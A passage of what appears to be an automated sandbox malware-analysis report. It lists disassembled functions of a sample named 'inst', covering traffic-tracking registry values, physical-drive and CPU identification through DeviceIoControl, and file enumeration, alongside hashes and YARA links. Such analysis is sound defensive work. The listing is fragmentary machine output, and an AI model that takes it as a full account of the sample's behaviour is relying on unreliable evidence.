                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 5F4FF8C3
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FFA31
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FF653
                                                                                                                                                                        • Part of subcall function 5F52AE62: GetSystemTimeAsFileTime.KERNEL32(5F5BC3F0,?,?,?,5F4FEABC,00000000,?,5F5BC3F0,5F5BC288), ref: 5F52AE6D
                                                                                                                                                                        • Part of subcall function 5F52AE62: __aulldiv.LIBCMT ref: 5F52AE8D
                                                                                                                                                                      • __time64.LIBCMT ref: 5F4FFA88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$__time64$CloseH_prolog3Time$CountException@8FileHandleObjectSingleSystemThrowTickWait__aulldiv_memsetstd::runtime_error::runtime_error
                                                                                                                                                                      • String ID: CurDownTraffic$CurUploadTime$CurUploadTraffic$LastDownTraffic$LastUploadDate$LastUploadTime$LastUploadTraffic$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$NonUrgentMode$reg NonUrgentMode:%d$reg NonUrgentMode:%d timeout
                                                                                                                                                                      • API String ID: 4167386882-1126348924
                                                                                                                                                                      • Opcode ID: 0804748605a4cbd95e40c5f68426cfd32d630a07ed4d503ee5594860c6db2b2e
                                                                                                                                                                      • Instruction ID: 3e3d8a4e02641bd6003c2b9ae86cf41aaa309f617f81334ccdb4b0bf1c98e024
                                                                                                                                                                      • Opcode Fuzzy Hash: 0804748605a4cbd95e40c5f68426cfd32d630a07ed4d503ee5594860c6db2b2e
                                                                                                                                                                      • Instruction Fuzzy Hash: C6123CB1D0134A9BDB14DFA5C984AEEB7F8FF84320F14462AE516A7350EB34A945CF90
                                                                                                                                                                      Function 5F52A6BA Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 313COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 519 5f52a6ba-5f52a6e2 520 5f52a6e4-5f52a703 call 5f52dc9f call 5f52dc8c call 5f528356 519->520 521 5f52a708-5f52a70a 519->521 547 5f52aaee 520->547 521->520 522 5f52a70c-5f52a71b _wcspbrk 521->522 524 5f52a733-5f52a738 522->524 525 5f52a71d-5f52a72e call 5f52dc8c call 5f52dc9f 522->525 528 5f52a757 __getdrive 524->528 529 5f52a73a-5f52a740 524->529 525->547 534 5f52a75c-5f52a779 FindFirstFileW 528->534 532 5f52a742-5f52a746 529->532 533 5f52a748-5f52a755 call 5f532b52 529->533 532->525 532->533 533->534 536 5f52a862-5f52a86c 534->536 537 5f52a77f-5f52a794 _wcspbrk 534->537 541 5f52a86e-5f52a878 536->541 542 5f52a8cd-5f52a8d3 536->542 537->525 543 5f52a796-5f52a7b6 __wfullpath_helper 537->543 541->542 548 5f52a87a-5f52a897 __wsopen_s 541->548 551 5f52a8e5-5f52a8fb FileTimeToLocalFileTime 542->551 552 5f52a8d5-5f52a8db 542->552 549 5f52a845-5f52a84b 543->549 550 5f52a7bc-5f52a7c6 _wcslen 543->550 553 5f52aaf1-5f52aaff call 5f5284d6 547->553 548->525 554 5f52a89d-5f52a8a4 548->554 549->525 558 5f52a851-5f52a85d call 5f5289a5 549->558 555 5f52a7d1-5f52a7db GetDriveTypeW 550->555 556 5f52a7c8-5f52a7cf call 5f52a5b9 550->556 559 5f52a901-5f52a917 FileTimeToSystemTime 551->559 560 5f52aad5-5f52aae8 GetLastError call 5f52dcb2 FindClose 551->560 552->551 557 5f52a8dd-5f52a8e3 552->557 554->525 563 5f52a8aa-5f52a8c8 call 5f531c06 call 5f531b39 554->563 555->549 565 5f52a7dd-5f52a7e3 555->565 556->549 556->555 566 5f52a95d-5f52a963 557->566 558->525 559->560 568 5f52a91d-5f52a95a ___loctotime64_t 559->568 560->547 563->553 575 5f52a7f1-5f52a840 ___loctotime64_t 565->575 576 5f52a7e5-5f52a7f0 call 5f5289a5 565->576 570 5f52a965-5f52a96b 566->570 571 5f52a97b-5f52a991 FileTimeToLocalFileTime 566->571 568->566 570->571 578 5f52a96d-5f52a979 570->578 571->560 579 5f52a997-5f52a9ad FileTimeToSystemTime 571->579 582 5f52aa95-5f52aad3 call 5f5319da 575->582 576->575 583 5f52a9f3-5f52a9f9 578->583 579->560 584 5f52a9b3-5f52a9f0 ___loctotime64_t 579->584 582->553 588 5f52aa11-5f52aa27 FileTimeToLocalFileTime 583->588 589 5f52a9fb-5f52aa01 583->589 584->583 588->560 593 5f52aa2d-5f52aa43 FileTimeToSystemTime 588->593 589->588 592 5f52aa03-5f52aa0f 589->592 594 5f52aa89-5f52aa8f FindClose 592->594 593->560 595 5f52aa49-5f52aa86 ___loctotime64_t 593->595 594->582 595->594
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcspbrk.LIBCMT ref: 5F52A712
                                                                                                                                                                        • Part of subcall function 5F52DC9F: __getptd_noexit.LIBCMT ref: 5F52DC9F
                                                                                                                                                                        • Part of subcall function 5F52DC8C: __getptd_noexit.LIBCMT ref: 5F52DC8C
                                                                                                                                                                        • Part of subcall function 5F528356: __decode_pointer.LIBCMT ref: 5F528361
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$__decode_pointer_wcspbrk
                                                                                                                                                                      • String ID: ./\
                                                                                                                                                                      • API String ID: 2357261805-3176372042
                                                                                                                                                                      • Opcode ID: 4561a9e80691eebe3dc8c5cbd30e70ce8d921a6b1c4719a134cd852d99404b40
                                                                                                                                                                      • Instruction ID: ae9a32289b643f6f4f7b0839683748e8ea8ea5a067fbe56e703533b974e3c66f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4561a9e80691eebe3dc8c5cbd30e70ce8d921a6b1c4719a134cd852d99404b40
                                                                                                                                                                      • Instruction Fuzzy Hash: B1C167F18016299ECB209F65CD446EAB7F8BF09311F0043BAE65CD25C1E735AA91CF69
                                                                                                                                                                      Function 001B592D Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __aulldiv$DiskDriveFreeSpaceType_memset
                                                                                                                                                                      • String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
                                                                                                                                                                      • API String ID: 3571217518-3034477485
                                                                                                                                                                      • Opcode ID: 6ba342d5eea3093c564dd165c499a1b17acae8cdef48cd3f997eabd0f23834a1
                                                                                                                                                                      • Instruction ID: b8e4e43aeed45aea42c77803b13175368f48f94ff7975567cd47bab80541840b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ba342d5eea3093c564dd165c499a1b17acae8cdef48cd3f997eabd0f23834a1
                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D6B1D10615BADB08DBB4AC96FFF76BAEB56704F21412AF506F3181E770491086A1
                                                                                                                                                                      Function 001D1A51 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1AAD
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,0017BD49,?), ref: 001D1AE5
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1B06
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D02C,?,0000022C,?,0000022C,?,00000000), ref: 001D1B82
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1B93
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 001D1BA5
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,0017BD49,?), ref: 001D1BCA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2371279349-613073274
                                                                                                                                                                      • Opcode ID: 3316a31004345573f7c1b6115653f0bae3f7d47106d7d11dd7fb3cf7f4fb1740
                                                                                                                                                                      • Instruction ID: 02b74669028a8ae0896dd407e421c43bd359b950d2ee475b38b1e965d777e9f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 3316a31004345573f7c1b6115653f0bae3f7d47106d7d11dd7fb3cf7f4fb1740
                                                                                                                                                                      • Instruction Fuzzy Hash: D3411A71901298AFDB31DFA8DC49FDE7BACAF19710F10051AE918EB281E7715604CF60
                                                                                                                                                                      Function 001D18BD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1918
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 001D194F
                                                                                                                                                                      • _memset.LIBCMT ref: 001D196D
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0007C088,?,00000021,?,00000210,?,00000000), ref: 001D19E2
                                                                                                                                                                      • _memset.LIBCMT ref: 001D19F5
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 001D1A07
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,0017BD49,?,?,?,?,?,?,?), ref: 001D1A2F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2371279349-613073274
                                                                                                                                                                      • Opcode ID: 732fcf4bc03cbde725f8b46cfe744f3470253a176d7f92463a98d77e9435432e
                                                                                                                                                                      • Instruction ID: 39f61e3dfdcb64d110904139b92b7d2559d42e0e59b4fca5cbfa2a7b3a4a68af
                                                                                                                                                                      • Opcode Fuzzy Hash: 732fcf4bc03cbde725f8b46cfe744f3470253a176d7f92463a98d77e9435432e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F41187190068CAFDF31DFA8DC85BDE7BACAB19304F10452AFA58AB282D77557048F60
                                                                                                                                                                      Function 001E2210 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001E2292
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E22D8
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E22E3
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2358
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E23D3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                      • String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                      • API String ID: 759969516-2564646230
                                                                                                                                                                      • Opcode ID: 24747aee90c59020d87bfdc3b201692b1ddc65e5fd27a073d420fdbae1188453
                                                                                                                                                                      • Instruction ID: 0da779d78ee0b1b8d8c3f46743280c176f33aa4fa679bf37c65aca8344bb69ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 24747aee90c59020d87bfdc3b201692b1ddc65e5fd27a073d420fdbae1188453
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D519AB0608B80AFD360CF258C91BAFB7E8FB99704F40492DF68DD6281E77495058F56
                                                                                                                                                                      Function 001D2158 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D2177
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 001D21BD
                                                                                                                                                                      • _memset.LIBCMT ref: 001D21DF
                                                                                                                                                                      • DeviceIoControl.KERNEL32(0017BD49,0004D030,?,00000028,?,00000028,?,00000000), ref: 001D2236
                                                                                                                                                                      • _memset.LIBCMT ref: 001D226C
                                                                                                                                                                      • CloseHandle.KERNEL32(0017BD49,?,?,?,?,?,00000038), ref: 001D22A9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 1408917728-613073274
                                                                                                                                                                      • Opcode ID: 34cb7de76dabffba6fd333ae0ac937f30670b2795fbff652553c5a9ecc5a71de
                                                                                                                                                                      • Instruction ID: d2ee5645051a41cabb3333284719e9adec57b9ac994156aedfda5ce1956d8e06
                                                                                                                                                                      • Opcode Fuzzy Hash: 34cb7de76dabffba6fd333ae0ac937f30670b2795fbff652553c5a9ecc5a71de
                                                                                                                                                                      • Instruction Fuzzy Hash: 30417EB5A0024CAFDB21EFA4EC85AEF77B8EF54704F00412AF925E7291EB345A458B50
                                                                                                                                                                      Function 001D1BEB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1C3E
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,?), ref: 001D1C6F
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1C90
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 001D1CF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0017BD49,?,?,?,?,?,00000000,?), ref: 001D1D29
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle
                                                                                                                                                                      • String ID: SCSIDISK$\\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2939382409-3226356902
                                                                                                                                                                      • Opcode ID: 81b0bf874545d30f12fbed5676d7cd56817fd14b4f5f3bf2a449edffa5930116
                                                                                                                                                                      • Instruction ID: 7a0ef436587e1cb03bb568598fa08da517820089f2c2a0962e4e612d92088bd4
                                                                                                                                                                      • Opcode Fuzzy Hash: 81b0bf874545d30f12fbed5676d7cd56817fd14b4f5f3bf2a449edffa5930116
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31FAB194028CAFEF31DFA4DC89EDE7BADAF19704F14412AB918AB292D7715604CB11
                                                                                                                                                                      Function 001BD71E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74filestringCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001BCF8A: FindClose.KERNEL32(?,?,001BD728,00000190,?,?,001C956F,?,?,?,?,?,?,?,0000000C), ref: 001BCFA4
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                      • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000190,?,?,001C956F,?,?,?,?,?,?,?,0000000C), ref: 001BD785
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 001BD796
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 001BD7A0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 3086268848-438819550
                                                                                                                                                                      • Opcode ID: 71d9cd7864e9f843ac9161c5d842b5d5e1403b52aa0761cc6df2c5ed61cb580b
                                                                                                                                                                      • Instruction ID: 031c39bb99edbae8f596ac9b26ae9c8c4324ab0424720951d2a58cb5c42a4b02
                                                                                                                                                                      • Opcode Fuzzy Hash: 71d9cd7864e9f843ac9161c5d842b5d5e1403b52aa0761cc6df2c5ed61cb580b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F11EFB27007046BE7286A717C89BFB329CEF69749F110939FA16D2141FFA0980087A1
                                                                                                                                                                      Function 001E25D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,001E335B,?,00000064), ref: 001E2645
                                                                                                                                                                      • _memset.LIBCMT ref: 001E267A
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 001E26A2
                                                                                                                                                                      • _memset.LIBCMT ref: 001E26BA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E2708
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                      • API String ID: 3752575622-2935326385
                                                                                                                                                                      • Opcode ID: c4762f1c1d0367d2238b2ff3aa1134dc1541818ffc9b3894aabf38253de5ef21
                                                                                                                                                                      • Instruction ID: 5c1484e3eaf4b1d5857a3c5f76b06c8f2459ce69e571fe14deb1b211171519e9
                                                                                                                                                                      • Opcode Fuzzy Hash: c4762f1c1d0367d2238b2ff3aa1134dc1541818ffc9b3894aabf38253de5ef21
                                                                                                                                                                      • Instruction Fuzzy Hash: 32418F71504780AFE324DF69DC8AEAFB7E8FFE9700F400A1DF59882181EB7495448B62
                                                                                                                                                                      Function 0016E080 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0016E084
